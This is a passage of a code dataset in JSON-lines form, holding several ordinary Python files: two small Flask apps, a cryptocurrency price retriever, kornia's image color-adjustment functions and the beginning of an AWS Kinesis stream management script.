\"content_preview.html\") or rerender_flag:\n post_html = open(post_path + \"content.html\").read()\n # if no '\")[p_counter] + \"

\"\n if \" 4: # max 4 paragraphs\n break\n content_preview += post_html.split(\"

\")[p_counter] + \"

\"\n\n print(f\"CONTENT PREVIEW: {content_preview}\")\n # save content_preview.html file\n with open(post_path + \"content_preview.html\", \"w\") as f:\n f.write(content_preview)\n \n return post_html, details\n\n\n# ----------------------------------------------------------------------------#\n# Launch.\n# ----------------------------------------------------------------------------#\n\n\ndef main():\n # generate all blog posts\n get_all_blog_content()\n\n app.config.update(\n DEBUG=True,\n TEMPLATES_AUTO_RELOAD=True,\n )\n app.run()\n\n# Default port:\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"nadiahay/vegan","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"30561871745","text":"# -*- coding: utf-8 -*-\nimport os\nfrom flask import Flask, request, render_template\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\nimport numpy as np\n\napp = Flask(__name__, static_folder='static')\n\n# 加载模型和类别列表\nmodel_path = \"H:/Ceshi/Food/models/model.h5\"\nclasses_path = \"H:/Ceshi/Food/classes.txt\"\nmodel = keras.models.load_model(model_path)\nwith open(classes_path) as f:\n classes = f.read().splitlines()\n# -*- coding: utf-8 -*-\nimport os\nfrom flask import Flask, request, render_template\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\nimport numpy as np\n\napp = Flask(__name__, static_folder='static')\n\n# 设置上传文件目录\nupload_folder = 'H:/Ceshi/Food/static'\napp.config['UPLOAD_FOLDER'] = upload_folder\n\n# 加载模型和类别列表\nmodel_path = \"H:/Ceshi/Food/models/model.h5\"\nclasses_path = \"H:/Ceshi/Food/classes.txt\"\nmodel = keras.models.load_model(model_path)\nwith open(classes_path) as f:\n classes = f.read().splitlines()\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef classify_food():\n if request.method == 'POST':\n # 上传并预测图片\n if 'file' not in request.files:\n return render_template('index.html', error='No file selected')\n\n file = request.files['file']\n if file.filename == '':\n return render_template('index.html', error='No file selected')\n\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], file.filename))\n\n img = load_img(os.path.join(app.config['UPLOAD_FOLDER'], file.filename), target_size=(224, 224))\n img_array = img_to_array(img)\n processed_img = preprocess_img(img_array)\n processed_img = np.expand_dims(processed_img, axis=0)\n\n prediction = model.predict(processed_img)\n predicted_class = classes[np.argmax(prediction)]\n\n return render_template('result.html', image_file=file.filename, predicted_class=predicted_class)\n else:\n return render_template('index.html')\n\n\n# 图片预处理 \ndef preprocess_img(img): \n # 添加预处理代码\n # 在这里替换为适当的图像预处理逻辑\n processed_img = img # 示例:不进行任何预处理,直接返回原始图像\n return processed_img\n\n\nif __name__ == '__main__':\n app.run(debug=False)","repo_name":"cfagafaga/DishDecipher","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"12648228240","text":"import urllib.request\nimport json\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\n\n# Constants for the API calls (used in URL header field)\nAPI_KEY = st.secrets[\"API_KEY\"]\nHEADER_VAL = \"x-messari-api-key\"\n\n# DataRetriever class to fetch data using the Messari API\n\n\nclass DataRetriever:\n\n def __init__(self, api_key):\n self.API_KEY = api_key # Initialize using the given API key\n\n def retrieve_currencies(self):\n # Placeholder dictionary to populate with data\n all_currencies = {}\n # Permanent URL for the API call to retrieve currencies\n # Defaulting to doing the 500 most popular currencies\n request_url = \"https://data.messari.io/api/v1/assets?limit=500&fields=id,slug,symbol,metrics/market_data/price_usd\"\n # Retrieve parsed JSON data\n currency_data = self.get_raw_data(request_url)\n # Ditch all the other stuff, and just read the currency slugs and names\n for item in currency_data[\"data\"]:\n all_currencies[item[\"symbol\"]] = item[\"slug\"]\n # Return the new dictionary to populate UI\n return all_currencies\n\n def get_market_data(self, currency, start_date, end_date):\n # Placeholder list to populate with amazing data from API\n historical_data = []\n # Create a beautiful query for the API call\n request_url = f\"https://data.messari.io/api/v1/assets/\" + currency + \\\n \"/metrics/price/time-series?start=\" + start_date + \\\n \"&end=\" + end_date + \"&interval=1d&order=ascending\"\n # Pull the raw JSON parsed data\n raw_data = self.get_raw_data(request_url)\n # Ditch all the other stuff, and just read the values\n retrieved_data = raw_data[\"data\"][\"values\"]\n # Create the new list with the time as key and closing price as value\n for item in retrieved_data:\n historical_data.append(item[4])\n # Conversions of data\n np_array = np.array(historical_data) # Convert to numpy array\n # Convert to pandas dataframe\n my_dataframe = pd.DataFrame(np_array, columns=['close'])\n my_dataframe['returns'] = 100 * \\\n np.log(my_dataframe['close']).diff() # Calculate returns\n my_dataframe = my_dataframe['returns'].dropna() # Drop NaN values\n returns = my_dataframe # Change the naming of the dataframe\n # Return the dataframe for further calculations\n return returns\n\n def get_raw_data(self, url):\n # Open a new request with the given URL\n my_request = urllib.request.Request(url)\n # Fix the header fields, so we have access to the API\n my_request.add_header(HEADER_VAL, API_KEY)\n # Read all that juicy data\n raw_data = urllib.request.urlopen(my_request).read()\n # Let Python turn the json into something useful\n parsed_data = json.loads(raw_data)\n # Return the parsed data\n return parsed_data\n","repo_name":"skrunsky/python-project","sub_path":"data_retriever.py","file_name":"data_retriever.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"35004409436","text":"from typing import Union, Optional\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom kornia.augmentation.utils import _transform_input3d\nfrom kornia.color.hsv import rgb_to_hsv, hsv_to_rgb\nfrom kornia.utils.image import _to_bchw\nfrom kornia.constants import pi\n\n\n__all__ = [\n \"adjust_brightness\",\n \"adjust_contrast\",\n \"adjust_gamma\",\n \"adjust_hue\",\n \"adjust_saturation\",\n \"adjust_hue_raw\",\n \"adjust_saturation_raw\",\n \"solarize\",\n \"equalize\",\n \"equalize3d\",\n \"posterize\",\n \"sharpness\",\n \"AdjustBrightness\",\n \"AdjustContrast\",\n \"AdjustGamma\",\n \"AdjustHue\",\n \"AdjustSaturation\",\n]\n\n\ndef adjust_saturation_raw(input: torch.Tensor, saturation_factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Adjust color saturation of an image. Expecting input to be in hsv format already.\n\n See :class:`~kornia.color.AdjustSaturation` for details.\n \"\"\"\n\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(saturation_factor, (float, torch.Tensor,)):\n raise TypeError(f\"The saturation_factor should be a float number or torch.Tensor.\"\n f\"Got {type(saturation_factor)}\")\n\n if isinstance(saturation_factor, float):\n saturation_factor = torch.tensor([saturation_factor])\n\n saturation_factor = saturation_factor.to(input.device).to(input.dtype)\n\n if (saturation_factor < 0).any():\n raise ValueError(f\"Saturation factor must be non-negative. Got {saturation_factor}\")\n\n for _ in input.shape[1:]:\n saturation_factor = torch.unsqueeze(saturation_factor, dim=-1)\n\n # unpack the hsv values\n h, s, v = torch.chunk(input, chunks=3, dim=-3)\n\n # transform the hue value and appl module\n s_out: torch.Tensor = torch.clamp(s * saturation_factor, min=0, max=1)\n\n # pack back back the corrected hue\n out: torch.Tensor = torch.cat([h, s_out, v], dim=-3)\n\n return out\n\n\ndef adjust_saturation(input: torch.Tensor, saturation_factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Adjust color saturation of an image.\n\n See :class:`~kornia.color.AdjustSaturation` for details.\n \"\"\"\n\n # convert the rgb image to hsv\n x_hsv: torch.Tensor = rgb_to_hsv(input)\n\n # perform the conversion\n x_adjusted: torch.Tensor = adjust_saturation_raw(x_hsv, saturation_factor)\n\n # convert back to rgb\n out: torch.Tensor = hsv_to_rgb(x_adjusted)\n\n return out\n\n\ndef adjust_hue_raw(input: torch.Tensor, hue_factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Adjust hue of an image. Expecting input to be in hsv format already.\n\n See :class:`~kornia.color.AdjustHue` for details.\n \"\"\"\n\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(hue_factor, (float, torch.Tensor)):\n raise TypeError(f\"The hue_factor should be a float number or torch.Tensor in the range between\"\n f\" [-PI, PI]. Got {type(hue_factor)}\")\n\n if isinstance(hue_factor, float):\n hue_factor = torch.tensor([hue_factor])\n\n hue_factor = hue_factor.to(input.device).to(input.dtype)\n\n if ((hue_factor < -pi) | (hue_factor > pi)).any():\n raise ValueError(f\"Hue-factor must be in the range [-PI, PI]. Got {hue_factor}\")\n\n for _ in input.shape[1:]:\n hue_factor = torch.unsqueeze(hue_factor, dim=-1)\n\n # unpack the hsv values\n h, s, v = torch.chunk(input, chunks=3, dim=-3)\n\n # transform the hue value and appl module\n divisor: float = 2 * pi.item()\n h_out: torch.Tensor = torch.fmod(h + hue_factor, divisor)\n\n # pack back back the corrected hue\n out: torch.Tensor = torch.cat([h_out, s, v], dim=-3)\n\n return out\n\n\ndef adjust_hue(input: torch.Tensor, hue_factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Adjust hue of an image.\n\n See :class:`~kornia.color.AdjustHue` for details.\n \"\"\"\n\n # convert the rgb image to hsv\n x_hsv: torch.Tensor = rgb_to_hsv(input)\n\n # perform the conversion\n x_adjusted: torch.Tensor = adjust_hue_raw(x_hsv, hue_factor)\n\n # convert back to rgb\n out: torch.Tensor = hsv_to_rgb(x_adjusted)\n\n return out\n\n\ndef adjust_gamma(input: torch.Tensor, gamma: Union[float, torch.Tensor],\n gain: Union[float, torch.Tensor] = 1.) -> torch.Tensor:\n r\"\"\"Perform gamma correction on an image.\n\n See :class:`~kornia.color.AdjustGamma` for details.\n \"\"\"\n\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(gamma, (float, torch.Tensor)):\n raise TypeError(f\"The gamma should be a positive float or torch.Tensor. Got {type(gamma)}\")\n\n if not isinstance(gain, (float, torch.Tensor)):\n raise TypeError(f\"The gain should be a positive float or torch.Tensor. Got {type(gain)}\")\n\n if isinstance(gamma, float):\n gamma = torch.tensor([gamma])\n\n if isinstance(gain, float):\n gain = torch.tensor([gain])\n\n gamma = gamma.to(input.device).to(input.dtype)\n gain = gain.to(input.device).to(input.dtype)\n\n if (gamma < 0.0).any():\n raise ValueError(f\"Gamma must be non-negative. Got {gamma}\")\n\n if (gain < 0.0).any():\n raise ValueError(f\"Gain must be non-negative. Got {gain}\")\n\n for _ in input.shape[1:]:\n gamma = torch.unsqueeze(gamma, dim=-1)\n gain = torch.unsqueeze(gain, dim=-1)\n\n # Apply the gamma correction\n x_adjust: torch.Tensor = gain * torch.pow(input, gamma)\n\n # Truncate between pixel values\n out: torch.Tensor = torch.clamp(x_adjust, 0.0, 1.0)\n\n return out\n\n\ndef adjust_contrast(input: torch.Tensor,\n contrast_factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Adjust Contrast of an image.\n\n See :class:`~kornia.color.AdjustContrast` for details.\n \"\"\"\n\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(contrast_factor, (float, torch.Tensor,)):\n raise TypeError(f\"The factor should be either a float or torch.Tensor. \"\n f\"Got {type(contrast_factor)}\")\n\n if isinstance(contrast_factor, float):\n contrast_factor = torch.tensor([contrast_factor])\n\n contrast_factor = contrast_factor.to(input.device).to(input.dtype)\n\n if (contrast_factor < 0).any():\n raise ValueError(f\"Contrast factor must be non-negative. Got {contrast_factor}\")\n\n for _ in input.shape[1:]:\n contrast_factor = torch.unsqueeze(contrast_factor, dim=-1)\n\n # Apply contrast factor to each channel\n x_adjust: torch.Tensor = input * contrast_factor\n\n # Truncate between pixel values\n out: torch.Tensor = torch.clamp(x_adjust, 0.0, 1.0)\n\n return out\n\n\ndef adjust_brightness(input: torch.Tensor,\n brightness_factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Adjust Brightness of an image.\n\n See :class:`~kornia.color.AdjustBrightness` for details.\n \"\"\"\n\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(brightness_factor, (float, torch.Tensor,)):\n raise TypeError(f\"The factor should be either a float or torch.Tensor. \"\n f\"Got {type(brightness_factor)}\")\n\n if isinstance(brightness_factor, float):\n brightness_factor = torch.tensor([brightness_factor])\n\n brightness_factor = brightness_factor.to(input.device).to(input.dtype)\n\n for _ in input.shape[1:]:\n brightness_factor = torch.unsqueeze(brightness_factor, dim=-1)\n\n # Apply brightness factor to each channel\n x_adjust: torch.Tensor = input + brightness_factor\n\n # Truncate between pixel values\n out: torch.Tensor = torch.clamp(x_adjust, 0.0, 1.0)\n\n return out\n\n\ndef _solarize(input: torch.Tensor, thresholds: Union[float, torch.Tensor] = 0.5) -> torch.Tensor:\n r\"\"\" For each pixel in the image, select the pixel if the value is less than the threshold.\n Otherwise, subtract 1.0 from the pixel.\n\n Args:\n input (torch.Tensor): image or batched images to solarize.\n thresholds (float or torch.Tensor): solarize thresholds.\n If int or one element tensor, input will be solarized across the whole batch.\n If 1-d tensor, input will be solarized element-wise, len(thresholds) == len(input).\n\n Returns:\n torch.Tensor: Solarized images.\n \"\"\"\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(thresholds, (float, torch.Tensor,)):\n raise TypeError(f\"The factor should be either a float or torch.Tensor. \"\n f\"Got {type(thresholds)}\")\n\n if isinstance(thresholds, torch.Tensor) and len(thresholds.shape) != 0:\n assert input.size(0) == len(thresholds) and len(thresholds.shape) == 1, \\\n f\"threshholds must be a 1-d vector of shape ({input.size(0)},). Got {thresholds}\"\n # TODO: I am not happy about this line, but no easy to do batch-wise operation\n thresholds = thresholds.to(input.device).to(input.dtype)\n thresholds = torch.stack([x.expand(*input.shape[1:]) for x in thresholds])\n\n return torch.where(input < thresholds, input, 1.0 - input)\n\n\ndef solarize(input: torch.Tensor, thresholds: Union[float, torch.Tensor] = 0.5,\n additions: Optional[Union[float, torch.Tensor]] = None) -> torch.Tensor:\n r\"\"\"For each pixel in the image less than threshold, we add 'addition' amount to it and then clip the\n pixel value to be between 0 and 1.0. The value of 'addition' is between -0.5 and 0.5.\n\n Args:\n input (torch.Tensor): image tensor with shapes like (C, H, W) or (B, C, H, W) to solarize.\n thresholds (float or torch.Tensor): solarize thresholds.\n If int or one element tensor, input will be solarized across the whole batch.\n If 1-d tensor, input will be solarized element-wise, len(thresholds) == len(input).\n additions (optional, float or torch.Tensor): between -0.5 and 0.5. Default None.\n If None, no addition will be performed.\n If int or one element tensor, same addition will be added across the whole batch.\n If 1-d tensor, additions will be added element-wisely, len(additions) == len(input).\n\n Returns:\n torch.Tensor: Solarized images.\n \"\"\"\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(thresholds, (float, torch.Tensor,)):\n raise TypeError(f\"The factor should be either a float or torch.Tensor. \"\n f\"Got {type(thresholds)}\")\n\n if isinstance(thresholds, float):\n thresholds = torch.tensor(thresholds)\n\n if additions is not None:\n if not isinstance(additions, (float, torch.Tensor,)):\n raise TypeError(f\"The factor should be either a float or torch.Tensor. \"\n f\"Got {type(additions)}\")\n\n if isinstance(additions, float):\n additions = torch.tensor(additions)\n\n assert torch.all((additions < 0.5) * (additions > -0.5)), \\\n f\"The value of 'addition' is between -0.5 and 0.5. Got {additions}.\"\n\n if isinstance(additions, torch.Tensor) and len(additions.shape) != 0:\n assert input.size(0) == len(additions) and len(additions.shape) == 1, \\\n f\"additions must be a 1-d vector of shape ({input.size(0)},). Got {additions}\"\n # TODO: I am not happy about this line, but no easy to do batch-wise operation\n additions = additions.to(input.device).to(input.dtype)\n additions = torch.stack([x.expand(*input.shape[1:]) for x in additions])\n input = input + additions\n input = input.clamp(0., 1.)\n\n return _solarize(input, thresholds)\n\n\ndef posterize(input: torch.Tensor, bits: Union[int, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Reduce the number of bits for each color channel. Non-differentiable function, uint8 involved.\n\n Args:\n input (torch.Tensor): image tensor with shapes like (C, H, W) or (B, C, H, W) to posterize.\n bits (int or torch.Tensor): number of high bits. Must be in range [0, 8].\n If int or one element tensor, input will be posterized by this bits.\n If 1-d tensor, input will be posterized element-wisely, len(bits) == input.shape[1].\n If n-d tensor, input will be posterized element-channel-wisely, bits.shape == input.shape[:len(bits.shape)]\n\n Returns:\n torch.Tensor: Image with reduced color channels.\n \"\"\"\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if isinstance(bits, int):\n bits = torch.tensor(bits)\n\n if not torch.all((bits >= 0) * (bits <= 8)) and bits.dtype == torch.int:\n raise ValueError(f\"bits must be integers within range [0, 8]. Got {bits}.\")\n\n # TODO: Make a differentiable version\n # Current version:\n # Ref: https://github.com/open-mmlab/mmcv/pull/132/files#diff-309c9320c7f71bedffe89a70ccff7f3bR19\n # Ref: https://github.com/tensorflow/tpu/blob/master/models/official/efficientnet/autoaugment.py#L222\n # Potential approach: implementing kornia.LUT with floating points\n # https://github.com/albumentations-team/albumentations/blob/master/albumentations/augmentations/functional.py#L472\n def _left_shift(input: torch.Tensor, shift: torch.Tensor):\n return ((input * 255).to(torch.uint8) * (2 ** shift)).to(input.dtype) / 255.\n\n def _right_shift(input: torch.Tensor, shift: torch.Tensor):\n return (input * 255).to(torch.uint8) / (2 ** shift).to(input.dtype) / 255.\n\n def _posterize_one(input: torch.Tensor, bits: torch.Tensor):\n # Single bits value condition\n if bits == 0:\n return torch.zeros_like(input)\n if bits == 8:\n return input.clone()\n bits = 8 - bits\n return _left_shift(_right_shift(input, bits), bits)\n\n if len(bits.shape) == 0 or (len(bits.shape) == 1 and len(bits) == 1):\n return _posterize_one(input, bits)\n\n res = []\n if len(bits.shape) == 1:\n input = _to_bchw(input)\n\n assert bits.shape[0] == input.shape[0], \\\n f\"Batch size must be equal between bits and input. Got {bits.shape[0]}, {input.shape[0]}.\"\n\n for i in range(input.shape[0]):\n res.append(_posterize_one(input[i], bits[i]))\n return torch.stack(res, dim=0)\n\n assert bits.shape == input.shape[:len(bits.shape)], \\\n f\"Batch and channel must be equal between bits and input. Got {bits.shape}, {input.shape[:len(bits.shape)]}.\"\n _input = input.view(-1, *input.shape[len(bits.shape):])\n _bits = bits.flatten()\n for i in range(input.shape[0]):\n res.append(_posterize_one(_input[i], _bits[i]))\n return torch.stack(res, dim=0).reshape(*input.shape)\n\n\ndef sharpness(input: torch.Tensor, factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Implements Sharpness function from PIL using torch ops.\n\n Args:\n input (torch.Tensor): image tensor with shapes like (C, H, W) or (B, C, H, W) to sharpen.\n factor (float or torch.Tensor): factor of sharpness strength. Must be above 0.\n If float or one element tensor, input will be sharpened by the same factor across the whole batch.\n If 1-d tensor, input will be sharpened element-wisely, len(factor) == len(input).\n\n Returns:\n torch.Tensor: Sharpened image or images.\n \"\"\"\n input = _to_bchw(input)\n if isinstance(factor, torch.Tensor):\n factor = factor.squeeze()\n if len(factor.size()) != 0:\n assert input.size(0) == factor.size(0), \\\n f\"Input batch size shall match with factor size if 1d array. Got {input.size(0)} and {factor.size(0)}\"\n else:\n factor = float(factor)\n kernel = torch.tensor([\n [1, 1, 1],\n [1, 5, 1],\n [1, 1, 1]\n ], dtype=input.dtype).view(1, 1, 3, 3).repeat(3, 1, 1, 1)\n\n # This shall be equivalent to depthwise conv2d:\n # Ref: https://discuss.pytorch.org/t/depthwise-and-separable-convolutions-in-pytorch/7315/2\n degenerate = torch.nn.functional.conv2d(input, kernel, bias=None, stride=1, groups=input.size(1))\n degenerate = torch.clamp(degenerate, 0., 1.)\n\n mask = torch.ones_like(degenerate)\n padded_mask = torch.nn.functional.pad(mask, [1, 1, 1, 1])\n padded_degenerate = torch.nn.functional.pad(degenerate, [1, 1, 1, 1])\n result = torch.where(padded_mask == 1, padded_degenerate, input)\n\n def _blend_one(input1: torch.Tensor, input2: torch.Tensor, factor: Union[float, torch.Tensor]) -> torch.Tensor:\n if isinstance(factor, torch.Tensor):\n factor = factor.squeeze()\n assert len(factor.size()) == 0, f\"Factor shall be a float or single element tensor. Got {factor}\"\n if factor == 0.:\n return input1\n if factor == 1.:\n return input2\n diff = (input2 - input1) * factor\n res = input1 + diff\n if factor > 0. and factor < 1.:\n return res\n return torch.clamp(res, 0, 1)\n if isinstance(factor, (float)) or len(factor.size()) == 0:\n return _blend_one(input, result, factor)\n return torch.stack([_blend_one(input[i], result[i], factor[i]) for i in range(len(factor))])\n\n\n# Code taken from: https://github.com/pytorch/vision/pull/796\ndef _scale_channel(im):\n \"\"\"Scale the data in the channel to implement equalize.\"\"\"\n im = im * 255\n\n # Compute the histogram of the image channel.\n histo = torch.histc(im, bins=256, min=0, max=255)\n # For the purposes of computing the step, filter out the nonzeros.\n nonzero_histo = torch.reshape(histo[histo != 0], [-1])\n step = (torch.sum(nonzero_histo) - nonzero_histo[-1]) // 255\n\n def build_lut(histo, step):\n # Compute the cumulative sum, shifting by step // 2\n # and then normalization by step.\n lut = (torch.cumsum(histo, 0) + (step // 2)) // step\n # Shift lut, prepending with 0.\n lut = torch.cat([torch.zeros(1, device=lut.device), lut[:-1]])\n # Clip the counts to be in range. This is done\n # in the C code for image.point.\n return torch.clamp(lut, 0, 255)\n\n # If step is zero, return the original image. Otherwise, build\n # lut from the full histogram and step and then index from it.\n if step == 0:\n result = im\n else:\n # can't index using 2d index. Have to flatten and then reshape\n result = torch.gather(build_lut(histo, step), 0, im.flatten().long())\n result = result.reshape_as(im)\n\n return result / 255.\n\n\ndef equalize(input: torch.Tensor) -> torch.Tensor:\n r\"\"\"Apply equalize on the input tensor.\n Implements Equalize function from PIL using PyTorch ops based on uint8 format:\n https://github.com/tensorflow/tpu/blob/master/models/official/efficientnet/autoaugment.py#L352\n\n Args:\n input (torch.Tensor): image tensor with shapes like :math:(C, H, W) or :math:(B, C, H, W) to equalize.\n\n Returns:\n torch.Tensor: Sharpened image or images.\n \"\"\"\n input = _to_bchw(input)\n\n res = []\n for image in input:\n # Assumes RGB for now. Scales each channel independently\n # and then stacks the result.\n scaled_image = torch.stack([_scale_channel(image[i, :, :]) for i in range(len(image))])\n res.append(scaled_image)\n return torch.stack(res)\n\n\ndef equalize3d(input: torch.Tensor) -> torch.Tensor:\n r\"\"\"Equalizes the values for a 3D volumetric tensor.\n\n Implements Equalize function for a sequence of images using PyTorch ops based on uint8 format:\n https://github.com/tensorflow/tpu/blob/master/models/official/efficientnet/autoaugment.py#L352\n\n Args:\n input (torch.Tensor): image tensor with shapes like :math:(C, D, H, W) or :math:(B, C, D, H, W) to equalize.\n\n Returns:\n torch.Tensor: Sharpened image or images with same shape as the input.\n \"\"\"\n input = _transform_input3d(input)\n\n res = []\n for volume in input:\n # Assumes RGB for now. Scales each channel independently\n # and then stacks the result.\n scaled_input = torch.stack([_scale_channel(volume[i, :, :, :]) for i in range(len(volume))])\n res.append(scaled_input)\n\n return torch.stack(res)\n\n\nclass AdjustSaturation(nn.Module):\n r\"\"\"Adjust color saturation of an image.\n\n The input image is expected to be an RGB image in the range of [0, 1].\n\n Args:\n input (torch.Tensor): Image/Tensor to be adjusted in the shape of (\\*, N).\n saturation_factor (float): How much to adjust the saturation. 0 will give a black\n and white image, 1 will give the original image while 2 will enhance the saturation\n by a factor of 2.\n\n Returns:\n torch.Tensor: Adjusted image.\n \"\"\"\n\n def __init__(self, saturation_factor: Union[float, torch.Tensor]) -> None:\n super(AdjustSaturation, self).__init__()\n self.saturation_factor: Union[float, torch.Tensor] = saturation_factor\n\n def forward(self, input: torch.Tensor) -> torch.Tensor: # type: ignore\n return adjust_saturation(input, self.saturation_factor)\n\n\nclass AdjustHue(nn.Module):\n r\"\"\"Adjust hue of an image.\n\n The input image is expected to be an RGB image in the range of [0, 1].\n\n Args:\n input (torch.Tensor): Image/Tensor to be adjusted in the shape of (\\*, N).\n hue_factor (float): How much to shift the hue channel. Should be in [-PI, PI]. PI\n and -PI give complete reversal of hue channel in HSV space in positive and negative\n direction respectively. 0 means no shift. Therefore, both -PI and PI will give an\n image with complementary colors while 0 gives the original image.\n\n Returns:\n torch.Tensor: Adjusted image.\n \"\"\"\n\n def __init__(self, hue_factor: Union[float, torch.Tensor]) -> None:\n super(AdjustHue, self).__init__()\n self.hue_factor: Union[float, torch.Tensor] = hue_factor\n\n def forward(self, input: torch.Tensor) -> torch.Tensor: # type: ignore\n return adjust_hue(input, self.hue_factor)\n\n\nclass AdjustGamma(nn.Module):\n r\"\"\"Perform gamma correction on an image.\n\n The input image is expected to be in the range of [0, 1].\n\n Args:\n input (torch.Tensor): Image/Tensor to be adjusted in the shape of (\\*, N).\n gamma (float): Non negative real number, same as γ\\gammaγ in the equation.\n gamma larger than 1 make the shadows darker, while gamma smaller than 1 make\n dark regions lighter.\n gain (float, optional): The constant multiplier. Default 1.\n\n Returns:\n torch.Tensor: Adjusted image.\n \"\"\"\n\n def __init__(self, gamma: Union[float, torch.Tensor], gain: Union[float, torch.Tensor] = 1.) -> None:\n super(AdjustGamma, self).__init__()\n self.gamma: Union[float, torch.Tensor] = gamma\n self.gain: Union[float, torch.Tensor] = gain\n\n def forward(self, input: torch.Tensor) -> torch.Tensor: # type: ignore\n return adjust_gamma(input, self.gamma, self.gain)\n\n\nclass AdjustContrast(nn.Module):\n r\"\"\"Adjust Contrast of an image. This implementation aligns OpenCV, not PIL. Hence,\n the output differs from TorchVision.\n\n The input image is expected to be in the range of [0, 1].\n\n Args:\n input (torch.Tensor): Image to be adjusted in the shape of (\\*, N).\n contrast_factor (Union[float, torch.Tensor]): Contrast adjust factor per element\n in the batch. 0 generates a compleatly black image, 1 does not modify\n the input image while any other non-negative number modify the\n brightness by this factor.\n\n Returns:\n torch.Tensor: Adjusted image.\n \"\"\"\n\n def __init__(self, contrast_factor: Union[float, torch.Tensor]) -> None:\n super(AdjustContrast, self).__init__()\n self.contrast_factor: Union[float, torch.Tensor] = contrast_factor\n\n def forward(self, input: torch.Tensor) -> torch.Tensor: # type: ignore\n return adjust_contrast(input, self.contrast_factor)\n\n\nclass AdjustBrightness(nn.Module):\n r\"\"\"Adjust Brightness of an image. This implementation aligns OpenCV, not PIL. Hence,\n the output differs from TorchVision.\n\n The input image is expected to be in the range of [0, 1].\n\n Args:\n input (torch.Tensor): Image/Input to be adjusted in the shape of (\\*, N).\n brightness_factor (Union[float, torch.Tensor]): Brightness adjust factor per element\n in the batch. 0 does not modify the input image while any other number modify the\n brightness.\n\n Returns:\n torch.Tensor: Adjusted image.\n \"\"\"\n\n def __init__(self, brightness_factor: Union[float, torch.Tensor]) -> None:\n super(AdjustBrightness, self).__init__()\n self.brightness_factor: Union[float, torch.Tensor] = brightness_factor\n\n def forward(self, input: torch.Tensor) -> torch.Tensor: # type: ignore\n return adjust_brightness(input, self.brightness_factor)\n","repo_name":"manyids2/kornia","sub_path":"kornia/enhance/adjust.py","file_name":"adjust.py","file_ext":"py","file_size_in_byte":25214,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"24123407937","text":"###########################################################################\n# Script Written By: Anshul Chandra\n#\n# For CSC 724 Project at North Carolina State University\n###########################################################################\n\nimport boto3\nimport os\nimport sys\n\n'''\n Class for handling the Kinesis data stream creation/deletion for ConSys\n'''\nclass KinesisHandler():\n\n def __init__(self):\n if os.environ.get('AWS_SECRET_ACCESS_KEY') == None or os.environ.get('AWS_ACCESS_KEY_ID') == None or os.environ.get('AWS_REGION_NAME') == None:\n print('Environment variables for AWS configuration not found')\n sys.exit()\n\n # Fetch Access keys from environment vars\n self.AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n self.AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\n self.AWS_REGION_NAME = os.environ['AWS_REGION_NAME']\n\n self.kinesisClient = boto3.client('kinesis',\n aws_access_key_id = self.AWS_ACCESS_KEY_ID,\n aws_secret_access_key = self.AWS_SECRET_ACCESS_KEY,\n region_name = self.AWS_REGION_NAME)\n\n '''\n Method to create data stream\n streamName: name of the data stream to be created\n shardCount: number of shards in the new stream to be created\n '''\n def createKinesisDataStream(self, streamName, shardCount):\n response = self.kinesisClient.create_stream(\n StreamName = streamName,\n ShardCount = shardCount\n )\n\n if response:\n print('Kinesis data stream ' + streamName + ' created successfully\\n')\n print('Response:', response)\n else:\n print('Unable to create data stream')\n\n\n '''\n Method to delete data stream\n streamName: name of the stream to be deleted\n '''\n def deleteKinesisDataStream(self, streamName):\n response = self.kinesisClient.delete_stream(\n StreamName = streamName\n )\n\n if response:\n print('Kinesis data stream ' + streamName + ' deleted successfully\\n')\n print('Response:', response)\n else:\n print('Unable to delete data stream')\n\nif __name__ == '__main__':\n\n objKinesis = KinesisHandler()\n\n streamName = 'ADS_CONSYS'\n\n if len(sys.argv) > 1:\n for i in range(1, len(sys.argv)):\n if sys.argv[i] == '-h':\n # Display help info.\n print(\"\\n\\t-c: Create Kinesis data stream\")\n print(\"\\t-d: Delete Kinesis data stream\\n\")\n sys.exit()\n\n for i in range(1, len(sys.argv)):\n if 